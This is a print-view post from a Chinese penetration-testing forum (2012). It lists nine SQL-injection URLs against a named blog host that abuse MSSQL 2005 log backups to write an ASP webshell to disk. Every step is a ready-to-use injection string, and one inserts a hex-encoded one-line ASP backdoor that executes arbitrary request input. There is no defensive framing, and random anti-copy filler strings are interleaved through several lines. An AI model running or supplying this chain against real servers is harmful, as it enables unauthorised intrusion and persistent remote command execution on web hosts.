中国网络渗透测试联盟

标题: Mssql2005 Log备份Webshell [打印本页]

---

作者: admin    时间: 2012-9-15 14:25
标题: Mssql2005 Log备份Webshell
第一步
http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--
7 \. J7 n- g. h% Y" Q
第二步：
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

  I+ Y& P3 v8 B0 A* W第三步
) R5 Y9 \0 N4 R! y* ihttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
/ T1 B% [5 \+ _7 I9 t
第四步
2 \% ~. a) L+ s8 g# t6 ^9 C* E( ~http://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--

第五步
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

" ]& |7 r- K- s6 M& e# }第六步
6 Z. Y2 c# O- j, F; ]http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
) g) x) G* ^% ]& g9 W/ `2 [% m
" p* i9 H! m! X1 e3 A: ^第七步
0 p' J  i& K: r/ V; ehttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

6 K" ~) x) N& M  @第八步
0 {3 ?  \! L. N) \http://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--

; @1 _1 w/ w- w! W% F第九步
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
. \4 J" ?5 Q6 L( x; c( s

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2